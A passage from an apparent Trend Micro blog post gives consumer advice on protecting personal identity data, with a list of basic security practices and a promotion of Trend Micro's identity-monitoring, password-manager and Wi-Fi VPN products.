The good news among all this bad is that if you remain skeptical about what you see online, are cautious about what you share, and follow some other simple rules, you’ll stand a greater chance of keeping your PII under lock and key. Best practices include:

Using strong, long and unique passwords for all accounts, managed with a password manager.Enable two-factor authentication (2FA) if possible on all accounts.Don’t overshare on social media.Freeze credit immediately if you suspect data has been misused.Remember that if something looks too good to be true online it usually is.Don’t use public Wi-Fi when out-and-about, especially not for sensitive log-ins, without a VPN.Change your password immediately if a provider tells you your data may have been breached.Only visit/enter payment details into HTTPS sites.Don’t click on links or open attachments in unsolicited emails.Only download apps from official app stores.Invest in AV from a reputable vendor for all your desktop and mobile devices.Ensure all operating systems and applications are on the latest version (i.e., patch frequently).Keep an eye on your bank account/credit card for any unusual spending activity.Consider investing in a service to monitor the dark web for your personal data.

How Trend Micro can help

Trend Micro offers solutions that can help to protect your digital identity.

Trend Micro ID Security is the best way to get proactive about data protection. It works 24/7 to monitor dark web sites for your PII and will sound the alarm immediately if it finds any sign your accounts or personal data have been stolen. It features

Dark Web Personal Data Manager to scour underground sites and alert if it finds personal info like bank account numbers, driver’s license numbers, SSNs and passport information.Credit Card Checker will do the same as the above but for your credit card information.Email Checker will alert you if any email accounts have been compromised and end up for sale on the dark web, allowing you to immediately change the password.Password Checker will tell you if any passwords you’re using have appeared for sale on the dark web, enabling you to improve password security.

Trend Micro Password Manager enables you to manage all your website and app log-ins from one secure location. Because Password Manager remembers and recalls your credentials on-demand, you can create long, strong and unique passwords for each account. As you’re not sharing easy-to-remember passwords across multiple accounts, you’ll be protected from popular credential stuffing and similar attacks.

Finally, Trend Micro WiFi Protection will protect you if you’re out and about connecting to WiFi hotspots. It automatically detects when a WiFi connection isn’t secure and enables a VPN—making your connection safer and helping keep your identity data private.

In short, it’s time to take an active part in protecting your personal identity data—as if your digital life depended on it. In large part, it does.

Source :
https://blog.trendmicro.com/identity-fraud-how-to-protect-your-identity-data-accounts-and-money-during-the-coronavirus-crisis/